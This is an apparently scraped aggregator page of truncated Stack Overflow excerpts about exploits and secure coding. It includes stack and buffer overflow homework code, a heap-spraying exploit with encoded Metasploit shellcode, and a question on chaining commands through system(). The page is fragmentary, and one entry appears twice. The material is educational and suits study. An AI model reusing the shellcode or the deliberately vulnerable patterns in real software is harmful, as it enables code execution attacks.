exploit

Stack Overflow Exploit in C

生来就可爱ヽ(ⅴ<●) submitted on 2019-11-27 11:49:29
Question: The question is actually about stack overflows in C. I have an assignment that I can not get done for the life of me, I've looked at everything in the gdb and I just can't figure it. The question is the following: int i,n; void confused() { printf("who called me"); exit(0); } void shell_call(char *c) { printf(" ***Now calling \"%s\" shell command *** \n",c); system(c); exit(0); } void victim_func() { int a[4]; printf("[8]:%x\n", &a[8]); printf("Enter n: "); scanf("%d",&n); printf("Enter %d HEX

Can parameterized statement stop all SQL injection?

让人想犯罪 __ submitted on 2019-11-27 10:50:32
If yes, why are there still so many successful SQL injections? Just because some developers are too dumb to use parameterized statements? The links that I have posted in my comments to the question explain the problem very well. I've summarised my feelings on why the problem persists, below: Those just starting out may have no awareness of SQL injection. Some are aware of SQL injection, but think that escaping is the (only?) solution. If you do a quick Google search for php mysql query, the first page that appears is the mysql_query page, on which there is an example that shows interpolating

How does this milw0rm heap spraying exploit work?

耗尽温柔 submitted on 2019-11-27 08:55:07
Question: I usually do not have difficulty reading JavaScript code but for this one I can’t figure out the logic. The code is from an exploit that has been published 4 days ago. You can find it at milw0rm. Here is the code: <html> <div id="replace">x</div> <script> // windows/exec - 148 bytes // http://www.metasploit.com // Encoder: x86/shikata_ga_nai // EXITFUNC=process, CMD=calc.exe var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff

How do I create formatted javascript console log messages

ぃ、小莉子 submitted on 2019-11-27 05:01:24
Question: I 'waddled' by the Console in Chrome on Facebook today. Surprisingly I got this message in the console. Now my question is: How is this possible? I know that there are a few 'exploit' methods for the console, but how can you make such font formatting in the console? (and is it console.log?) Answer 1: Yes, you can format the console.log() with something like this: console.log("%cExtra Large Yellow Text with Red Background", "background: red; color: yellow; font-size: x-large"); Note the %c

Writing Secure C and Secure C Idioms

爷,独闯天下 submitted on 2019-11-26 23:50:06
Question: "The average man does not want to be free. He simply wants to be safe." - H. L. Mencken I am attempting to write very secure C. Below I list some of the techniques I use and ask are they as secure as I think they are. Please don't hesitate to tear my code/preconceptions to shreds. Any answer that finds even the most trivial vulnerability or teaches me a new idea will be highly valued. Reading from a stream: According to the GNU C Programming Tutorial getline: The getline function will

buffer overflow example from Art of Exploitation book

南笙酒味 submitted on 2019-11-26 18:14:37
Question: I was reading this book Art of Exploitation, which is kinda a good book, and I ran across that example from the exploit_notesearch.c file. Briefly, the author tries to overflow the program from notesearch.c int main(int argc, char *argv[]) { int userid, printing=1, fd; char searchstring[100]; if(argc > 1) // If there is an arg strcpy(searchstring, argv[1]); else // otherwise, searchstring[0] = 0; The argument of the main function is copied to the searchstring array and if the argument is bigger than 100

Using a Single system() Call to Execute Multiple Commands in C

送分小仙女□ submitted on 2019-11-26 17:04:43
Question: In an information security lab I'm working on, I've been tasked with executing multiple commands with a single call to "system()" (written in C, running on Fedora). What is the syntax that will allow me to execute more than one command through system()? (The idea being you could execute arbitrary commands through a program running on a remote computer, if the program interacts with the OS through the system() call.) I.e.: char command[] = "????? \r\n"; system(command); Answer 1: That depends on the

Can parameterized statement stop all SQL injection?

本秂侑毒 submitted on 2019-11-26 15:19:11
Question: If yes, why are there still so many successful SQL injections? Just because some developers are too dumb to use parameterized statements? Answer 1: The links that I have posted in my comments to the question explain the problem very well. I've summarised my feelings on why the problem persists, below: Those just starting out may have no awareness of SQL injection. Some are aware of SQL injection, but think that escaping is the (only?) solution. If you do a quick Google search for php mysql query,